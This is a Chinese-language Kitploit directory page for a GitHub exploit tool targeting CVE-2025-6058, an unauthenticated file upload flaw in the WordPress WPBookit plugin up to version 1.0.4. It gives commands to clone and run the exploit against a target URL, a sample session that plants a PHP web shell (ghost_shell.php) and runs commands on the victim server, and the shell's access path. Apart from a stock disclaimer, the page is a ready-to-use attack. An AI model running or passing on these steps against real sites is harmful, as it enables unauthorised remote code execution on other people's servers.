Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 未认证文件上传漏洞利用 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2025-6058
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHub0xgh057r3c0n/cve-2025-6058

CVE-2025-6058

WordPress WPBookit ≤ 1.0.4 未认证文件上传漏洞利用

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WordPress 标志

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 未授权文件上传利用工具

针对 WordPress WPBookit 插件(≤ 1.0.4)的未授权任意文件上传利用工具
该利用工具支持远程 Shell 上传和完整命令执行。

作者:0xgh057r3c0n


📌 关于漏洞

CVE-2025-6058 是一个影响 WordPress CMS 上 WPBookit 插件的严重漏洞。未授权攻击者可利用存在漏洞的 AJAX 端点上传任意 PHP 文件,从而实现 远程代码执行(RCE)。

  • 🎯 目标:WordPress CMS(存在漏洞的 WPBookit 插件)
  • 📦 受影响插件:WPBookit ≤ 1.0.4
  • ⚠️ 风险等级:严重(未授权 RCE)

✨ 功能特性

  • 🔍 通过 README.txt 自动检测 WordPress 插件版本
  • 📤 上传轻量级 PHP Shell(ghost_shell.php)
  • 🖥️ 交互式 Shell(仿 Parrot 风格提示符)
  • 🌐 未授权 — 无需登录
  • 🎨 彩色 CLI 输出

🚀 使用指南

💻 环境要求

root@kitploit:~
python3 --version
pip install requests

⚙️ 利用工具执行

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Shell 会话示例

root@kitploit:~
python3 CVE-2025-6058.py -u https://victim.com

[>] 正在检查插件版本...
[+] 发现插件版本:1.0.4
[!] 目标版本存在漏洞。

[>] 正在上传 Shell...
[+] 上传成功。
[+] Shell URL:https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] 交互式 GhostShell 已启动 — 输入 'exit' 退出。

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Shell 详细信息

  • 文件名称:ghost_shell.php
  • 路径:/wp-content/uploads/YYYY/MM/ghost_shell.php
  • 示例:
root@kitploit:~
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

⚠️ 法律免责声明

此利用工具仅用于教育目的和授权渗透测试。未经明确同意而对系统进行未授权使用属于违法行为。


📄 许可证

根据 MIT 许可证 发布


由 0xgh057r3c0n 为 WordPress 安全审计制作 🛡️

下载工具